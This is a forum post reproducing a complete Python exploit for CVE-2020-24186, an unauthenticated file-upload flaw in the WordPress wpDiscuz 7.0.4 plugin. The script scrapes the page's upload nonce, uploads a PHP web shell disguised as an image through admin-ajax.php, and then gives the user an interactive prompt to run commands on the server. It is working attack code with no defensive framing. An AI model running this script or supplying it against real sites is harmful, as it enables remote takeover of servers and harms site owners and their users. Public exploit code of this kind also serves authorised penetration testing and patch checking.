WordPress wpDiscuz 7.0.4 Remote Code Execution

#312
Topic created · 1 Posts · 3 Views
  • #!/bin/python3
    
    # Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Unauthenticated Remote Code Execution
    # Google Dork: N/A
    # Date: 2021/06/08
    # Exploit Author: Fellipe Oliveira
    # Vendor Homepage: https://gvectors.com/
    # Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip
    # Version: wpDiscuz 7.0.4
    # Tested on: Debian9, Windows 7, Windows 10 (Wordpress 5.7.2)
    # CVE : CVE-2020-24186
    # Thanks for the great contribution to the code: Z3roC00l (https://twitter.com/zeroc00I)
    
    import requests
    import optparse
    import re
    import random
    import time
    import string
    import json
    
    parser = optparse.OptionParser()
    parser.add\_option('-u', '--url', action="store", dest="url", help="Base target host: http://192.168.1.81/blog")
    parser.add\_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /2021/06/blogpost")
    
    
    options, args = parser.parse\_args()
    
    if not options.url or not options.path:
     print('[+] Specify an url target')
     print('[+] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost')
     print('[+] Example help usage: exploit.py -h')
     exit()
    
    session = requests.Session()
    
    main\_url = options.url
    path = options.path
    url\_blog = main\_url + path
    clean\_host = main\_url.replace('http://', '').replace('/wordpress','')
    
    def banner():
     print('---------------------------------------------------------------')
     print('[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution')
     print('[-] File Upload Bypass Vulnerability - PHP Webshell Upload')
     print('[-] CVE: CVE-2020-24186')
     print('[-] https://github.com/hevox')
     print('--------------------------------------------------------------- \n')
    
    def csrfRequest():
     global wmuSec
     global wc\_post\_id
    
     try:
     get\_html = session.get(url\_blog)
     response\_len = str(len(get\_html.text))
     response\_code = str(get\_html.status\_code)
     print('[+] Response length:['+response\_len+'] | code:['+response\_code+']')
    
     raw\_wmu = get\_html.text.replace(',','\n')
     wmuSec = re.findall('wmuSecurity.*$',raw\_wmu,re.MULTILINE)[0].split('"')[2]
     print('[!] Got wmuSecurity value: '+ wmuSec +'')
     raw\_postID = get\_html.text.replace(',','\n')
     wc\_post\_id = re.findall('wc\_post\_id.*$',raw\_postID,re.MULTILINE)[0].split('"')[2]
     print('[!] Got wmuSecurity value: '+ wc\_post\_id +' \n')
    
     except requests.exceptions.ConnectionError as err:
     print('\n[x] Failed to Connect in: '+url\_blog+' ')
     print('[x] This host seems to be Down')
     exit()
    
    
    def nameRandom():
     global shell\_name 
     print('[+] Generating random name for Webshell...')
     shell\_name = ''.join((random.choice(string.ascii\_lowercase) for x in range(15)))
     time.sleep(1) 
     print('[!] Generated webshell name: '+shell\_name+'\n')
    
     return shell\_name
    
    
    def shell\_upload():
     global shell
     print('[!] Trying to Upload Webshell..')
     try:
     upload\_url = main\_url + "/wp-admin/admin-ajax.php"
     upload\_cookies = {"wordpress\_test\_cookie": "WP%20Cookie%20check", "wpdiscuz\_hide\_bubble\_hint": "1"}
     upload\_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86\_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------2032192841253859011643762941", "Origin": "http://"+clean\_host+"", "Connection": "close", "Referer": url\_blog}
     upload\_data = "-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwmuUploadFiles\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu\_nonce\"\r\n\r\n"+wmuSec+"\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\r\n\r\n\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu\_files[0]\"; filename=\""+shell\_name+".php\"\r\nContent-Type: image/png\r\n\r\nGIF689a;\r\n\r\n<?php system($\_GET['cmd']); ?>\r\n\x1a\x82\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"postId\"\r\n\r\n"+wc\_post\_id+"\r\n-----------------------------2032192841253859011643762941--\r\n"
     check = session.post(upload\_url, headers=upload\_headers, cookies=upload\_cookies, data=upload\_data)
     json\_object = (json.loads(check.text))
     status = (json\_object["success"])
    
     get\_path = (check.text.replace(',','\n'))
     shell\_pret = re.findall('url.*$',get\_path,re.MULTILINE)
     find\_shell = str(shell\_pret)
     raw = (find\_shell.replace('\\','').replace('url&quot;:&quot;','').replace('\',','').replace('&quot;','').replace('[\'',''))
     shell = (raw.split(" ",1)[0])
    
     if status == True:
     print('[+] Upload Success... Webshell path:' +shell+' \n')
     else:
     print('[x] Failed to Upload Webshell in: '+ url\_blog +' ')
     exit()
    
     except requests.exceptions.HTTPError as conn:
     print('[x] Failed to Upload Webshell in: '+ url\_blog +' ')
    
     return shell
    
    
    def code\_exec():
     try:
     while True:
     cmd = input('> ')
     codex = session.get(shell + '?cmd='+cmd+'')
     print(codex.text.replace('GIF689a;','').replace('�',''))
     except:
     print('\n[x] Failed to execute PHP code...')
    
    
    banner()
    csrfRequest()
    nameRandom()
    shell\_upload()
    code\_exec()
    
    
Log in to reply